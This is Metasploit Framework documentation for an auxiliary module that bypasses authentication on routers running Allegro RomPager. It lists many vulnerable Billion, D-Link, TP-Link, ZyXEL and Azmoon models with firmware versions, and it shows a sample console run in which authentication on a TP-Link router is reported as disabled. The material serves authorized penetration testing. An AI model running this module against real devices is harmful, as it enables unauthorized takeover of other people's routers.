documentation/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.md from rapid7/metasploit-framework

documentation/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.md
Summary

Maintainability

Test Coverage

Issues
## Vulnerable devices

The following devices and firmware versions are known to be vulnerable:

 * Azmoon   AZ-D140W - 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1
 * Billion  BiPAC 5102S - Av2.7.0.23 (UE0.B1C)
 * Billion  BiPAC 5102S - Bv2.7.0.23 (UE0.B1C)
 * Billion  BiPAC 5200 - 2.11.84.0(UE2.C2)3.11.11.6
 * Billion  BiPAC 5200 - 2_11_62_2_ UE0.C2D_3_10_16_0
 * Billion  BiPAC 5200A - 2_10_5 _0(RE0.C2)3_6_0_0
 * Billion  BiPAC 5200A - 2_11_38_0 (RE0.C29)3_10_5_0
 * Billion  BiPAC 5200GR4 - 2.11.91.0(RE2.C29)3.11.11.52
 * Billion  BiPAC 5200SRD - 2.10.5.0 (UE0.C2C) 3.6.0.0
 * Billion  BiPAC 5200SRD - 2.12.17.0_UE2.C3_3.12.17.0
 * Billion  BiPAC 5200SRD - 2_11_62_2(UE0.C3D)3_11_11_22
 * D-Link   DSL-2520U - Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL
 * D-Link   DSL-2600U - Z1_DSL-2600U
 * D-Link   DSL-2600U - Z2_V1.08_ras
 * TP-Link  TD-8616 - V2_080513
 * TP-Link  TD-8816 - V4_100528_Russia
 * TP-Link  TD-8816 - V4_100524
 * TP-Link  TD-8816 - V5_100528_Russia
 * TP-Link  TD-8816 - V5_100524
 * TP-Link  TD-8816 - V5_100903
 * TP-Link  TD-8816 - V6_100907
 * TP-Link  TD-8816 - V7_111103
 * TP-Link  TD-8816 - V7_130204
 * TP-Link  TD-8817 - V5_100524
 * TP-Link  TD-8817 - V5_100702_TR
 * TP-Link  TD-8817 - V5_100903
 * TP-Link  TD-8817 - V6_100907
 * TP-Link  TD-8817 - V6_101221
 * TP-Link  TD-8817 - V7_110826
 * TP-Link  TD-8817 - V7_130217
 * TP-Link  TD-8817 - V7_120509
 * TP-Link  TD-8817 - V8_140311
 * TP-Link  TD-8820 - V3_091223
 * TP-Link  TD-8840T - V1_080520
 * TP-Link  TD-8840T - V2_100525
 * TP-Link  TD-8840T - V2_100702_TR
 * TP-Link  TD-8840T - V2_090609
 * TP-Link  TD-8840T - V3_101208
 * TP-Link  TD-8840T - V3_110221
 * TP-Link  TD-8840T - V3_120531
 * TP-Link  TD-W8101G - V1_090107
 * TP-Link  TD-W8101G - V1_090107
 * TP-Link  TD-W8101G - V2_100819
 * TP-Link  TD-W8101G - V2_101015_TR
 * TP-Link  TD-W8101G - V2_101101
 * TP-Link  TD-W8101G - V3_110119
 * TP-Link  TD-W8101G - V3_120213
 * TP-Link  TD-W8101G - V3_120604
 * TP-Link  TD-W8151N - V3_120530
 * TP-Link  TD-W8901G - V1_080522
 * TP-Link  TD-W8901G - V1,2_080522
 * TP-Link  TD-W8901G - V2_090113_Turkish
 * TP-Link  TD-W8901G - V3_140512
 * TP-Link  TD-W8901G - V3_100603
 * TP-Link  TD-W8901G - V3_100702_TR
 * TP-Link  TD-W8901G - V3_100901
 * TP-Link  TD-W8901G - V6_110119
 * TP-Link  TD-W8901G - V6_110915
 * TP-Link  TD-W8901G - V6_120418
 * TP-Link  TD-W8901G - V6_120213
 * TP-Link  TD-W8901GB - V3_100727
 * TP-Link  TD-W8901GB - V3_100820
 * TP-Link  TD-W8901N - V1_111211
 * TP-Link  TD-W8951ND - V1_101124,100723,100728
 * TP-Link  TD-W8951ND - V1_110907
 * TP-Link  TD-W8951ND - V1_111125
 * TP-Link  TD-W8951ND - V3.0_110729_FI
 * TP-Link  TD-W8951ND - V3_110721
 * TP-Link  TD-W8951ND - V3_20110729_FI
 * TP-Link  TD-W8951ND - V4_120511
 * TP-Link  TD-W8951ND - V4_120607
 * TP-Link  TD-W8951ND - V4_120912_FL
 * TP-Link  TD-W8961NB - V1_110107
 * TP-Link  TD-W8961NB - V1_110519
 * TP-Link  TD-W8961NB - V2_120319
 * TP-Link  TD-W8961NB - V2_120823
 * TP-Link  TD-W8961ND - V1_100722,101122
 * TP-Link  TD-W8961ND - V1_101022_TR
 * TP-Link  TD-W8961ND - V1_111125
 * TP-Link  TD-W8961ND - V2_120427
 * TP-Link  TD-W8961ND - V2_120710_UK
 * TP-Link  TD-W8961ND - V2_120723_FI
 * TP-Link  TD-W8961ND - V3_120524,120808
 * TP-Link  TD-W8961ND - V3_120830
 * ZyXEL    P-660R-T3 - 3.40(BOQ.0)C0
 * ZyXEL    P-660RU-T3 - 3.40(BJR.0)C0

## Module usage

  This is an example run against TP-Link TD-8817 router:

```
msf > use auxiliary/admin/http/allegro_rompager_auth_bypass
msf auxiliary(allegro_rompager_auth_bypass) > show options

Module options (auxiliary/admin/http/allegro_rompager_auth_bypass):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.1      yes       The target address
   RPORT      80               yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       URI to test
   VHOST                       no        HTTP server virtual host


msf auxiliary(allegro_rompager_auth_bypass) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf auxiliary(allegro_rompager_auth_bypass) > run

[+] Detected device:TP-Link TD-8817
[-] Bad response
[-] Bad response
[+] Good response, please check host, authentication should be disabled
[*] Auxiliary module execution completed
```